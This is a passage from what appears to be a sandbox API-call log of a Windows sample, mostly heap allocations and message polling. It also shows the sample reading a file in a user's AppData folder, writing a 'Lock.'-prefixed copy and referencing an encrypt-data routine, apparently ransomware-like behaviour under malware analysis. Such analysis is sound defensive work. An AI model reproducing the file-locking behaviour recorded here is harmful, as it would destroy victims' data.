hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0226.326] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4b8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0226.327] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0226.328] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0226.328] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.328] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.328] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505d8 [0226.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0226.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0226.328] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.329] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/BTjJSlc2bP-ki.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\btjjslc2bp-ki.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0226.329] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.329] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0226.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0226.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0226.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.329] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0226.329] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0226.330] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0226.330] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0226.330] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.BTjJSlc2bP-ki.swf" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.btjjslc2bp-ki.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0226.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0226.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.331] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0226.331] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0226.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0226.332] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.335] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0226.335] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x24f6, lpOverlapped=0x0) returned 1 [0226.395] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0226.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0226.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0226.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.396] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24f6) returned 0x3bf0dd8 [0226.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5c020 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24f6) returned 0x3bf32d8 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.399] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.399] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24f6) returned 0x3bf0dd8 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0dd8 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.399] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0226.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0226.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0226.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0226.400] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0226.400] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0226.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0226.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24f6) returned 0x3bf0dd8 [0226.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ef8 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0226.400] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0226.400] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55038 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0226.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fa8 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0226.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24f6) returned 0x3bf57d8 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.401] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0226.401] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0226.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0226.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0226.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.402] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0226.402] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0226.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.402] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0226.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.403] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.403] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.403] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0226.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0226.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0226.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0226.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0226.414] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0226.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0226.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0226.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0226.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.415] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, 